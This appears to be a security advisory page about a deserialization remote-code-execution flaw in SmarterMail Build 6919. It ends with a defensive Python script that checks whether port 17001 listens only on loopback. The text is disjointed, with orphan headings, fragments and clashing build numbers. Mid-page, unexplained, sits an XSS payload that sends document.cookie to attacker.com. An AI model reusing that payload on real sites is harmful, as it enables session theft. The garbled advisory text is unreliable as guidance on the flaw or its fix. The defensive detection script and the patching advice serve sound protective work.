SmarterMail 6919 Exploit

If you are running SmarterMail or any version from the 15.x series, you are likely vulnerable.

SmarterTools has released a patch to address this vulnerability. Immediate action is required.

Log in to SmarterMail as System Admin → Settings → About SmarterMail. If your build number is lower than 16.3.7005, proceed immediately.

Patching does not remove the backdoor. If an attacker placed a shell in a log file on January 1st, and you upgrade to Build 6922 on January 15th, that log file is still executable if accessed via the old exploit vector (which is now blocked). However, if the attacker already established a scheduled task or service, patching is futile.

<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

: Use of Hardcoded Secret Keys, which could facilitate further compromise.

An attacker can construct a custom, malicious serialized payload. When the server automatically deserializes this payload, it blindly executes embedded commands. Because the core SmarterMail Windows service runs with elevated privileges, the injected commands are carried out natively by the host operating system's highest access token: NT AUTHORITY\SYSTEM.

Anatomy of the Attack Vector

SmarterMail Build 6919 is affected by a critical Remote Code Execution (RCE) vulnerability, tracked as CVE-2019-7214, which stems from the deserialization of untrusted data.

The Core Vulnerability

The fallout from an unpatched mail gateway exploit reaches across the entire corporate perimeter.

Data Theft and Espionage

In Build 6985 and all subsequent versions, developers restricted the .NET remoting endpoint listener to bind exclusively to the loopback interface (127.0.0.1:17001). This prevents remote network entities from executing unauthenticated actions across the socket.

2. Implement Network-Level Microsegmentation
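
A defender-side check for the loopback-only binding of port 17001 described above, as an added example that is not from the original page or from SmarterTools: it parses Windows netstat -ano output and reports any listener on that port bound to a non-loopback address. The sample output and the function name are constructed for illustration.

```python
import ipaddress

REMOTING_PORT = 17001  # port named on the page for the .NET remoting listener

# Constructed samples of Windows `netstat -ano` output (not from a real host).
SAMPLE_PATCHED = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING       2292
  TCP    127.0.0.1:17001        0.0.0.0:0              LISTENING       2292
  TCP    10.0.0.5:50122         10.0.0.9:17001         ESTABLISHED     4410
"""
SAMPLE_EXPOSED = """\
  TCP    0.0.0.0:17001          0.0.0.0:0              LISTENING       2292
  TCP    [::]:17001             [::]:0                 LISTENING       2292
  TCP    [::1]:17001            [::]:0                 LISTENING       2292
"""


def exposed_listeners(netstat_text, port=REMOTING_PORT):
    """Return local addresses listening on `port` that are not loopback."""
    exposed = []
    for line in netstat_text.splitlines():
        fields = line.split()
        # Expect: proto, local, foreign, state[, pid]; only TCP listeners matter.
        if len(fields) < 4 or fields[0].upper() != "TCP":
            continue
        if fields[3].upper() != "LISTENING":
            continue  # skips outbound connections whose *remote* port is 17001
        host, _, port_text = fields[1].rpartition(":")
        if not port_text.isdigit() or int(port_text) != port:
            continue
        host = host.strip("[]").split("%", 1)[0]  # drop IPv6 brackets and scope id
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            exposed.append(fields[1])  # unparseable bind address: report, do not assume safe
            continue
        if not addr.is_loopback:
            exposed.append(fields[1])
    return exposed


if __name__ == "__main__":
    for name, text in (("patched", SAMPLE_PATCHED), ("exposed", SAMPLE_EXPOSED)):
        print(name, exposed_listeners(text) or "loopback only")
```

An empty result means every listener on the port is bound to 127.0.0.1 or ::1; wildcard binds such as 0.0.0.0 and [::] are reported because they accept connections on every interface.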